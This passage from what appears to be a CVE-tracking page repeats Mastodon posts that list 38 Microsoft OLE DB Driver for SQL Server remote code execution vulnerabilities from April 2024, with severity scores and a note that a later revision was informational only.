  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28937
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28911
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28942
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-09T18:30:37

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
